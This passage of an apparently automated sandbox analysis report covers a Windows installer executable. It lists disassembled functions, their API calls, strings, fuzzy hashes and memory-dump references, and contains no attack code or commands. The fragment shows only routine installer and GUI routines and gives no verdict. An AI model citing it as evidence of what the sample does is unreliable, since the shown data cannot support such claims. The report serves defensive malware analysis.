                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N$tH
                                                  • API String ID: 3103080414-1290530410
                                                  • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                  • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                  • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                  • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                  • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                  • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                  • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                  • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                  • wsprintfA.USER32 ref: 004060B3
                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                  • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                  • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                  • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-450781896
                                                  • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                  • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                  • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                  • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                  • GetSysColor.USER32(00000000), ref: 00404421
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                  • SetBkMode.GDI32(?,?), ref: 00404439
                                                  • GetSysColor.USER32(?), ref: 0040444C
                                                  • SetBkColor.GDI32(?,?), ref: 0040445C
                                                  • DeleteObject.GDI32(?), ref: 00404476
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                  • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                  • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                  • GetTickCount.KERNEL32 ref: 00402EC7
                                                  • wsprintfW.USER32 ref: 00402EF5
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                    • Part of subcall function 00402E72: MulDiv.KERNEL32(0001EC36,00000064,00023754), ref: 00402E87
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
                                                  • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                  • Opcode Fuzzy Hash: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
                                                  • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                  • GetMessagePos.USER32 ref: 00404D3D
                                                  • ScreenToClient.USER32(?,?), ref: 00404D57
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401DBC
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Tahoma
                                                  • API String ID: 3808545654-3580928618
                                                  • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                  • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                  • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                  • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                  • wsprintfW.USER32 ref: 00402E45
                                                  • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                  • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                  • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                  • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                  APIs
                                                    • Part of subcall function 73B0121B: GlobalAlloc.KERNEL32(00000040,?,73B0123B,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B01225
                                                  • GlobalFree.KERNEL32(?), ref: 73B02657
                                                  • GlobalFree.KERNEL32(00000000), ref: 73B0268C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: d330101e723b710f9bfadb5cbec11726dbc0cc9e5a986912be449b4f20b71ad4
                                                  • Instruction ID: a9f301b07c9ba8c5a453d985304e2d4b1a79a415b0c003b342faaaff9d4deb3c
                                                  • Opcode Fuzzy Hash: d330101e723b710f9bfadb5cbec11726dbc0cc9e5a986912be449b4f20b71ad4
                                                  • Instruction Fuzzy Hash: 1F312272504109DFEB269F50CAD4F2E7FBAFB86308B244139F5469B964EB309808CF21
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                  • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                  • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                  • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                  APIs
                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                  • wsprintfW.USER32 ref: 00404CB6
                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$(7B
                                                  • API String ID: 3540041739-1320723960
                                                  • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                  • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                  • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                  • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                  APIs
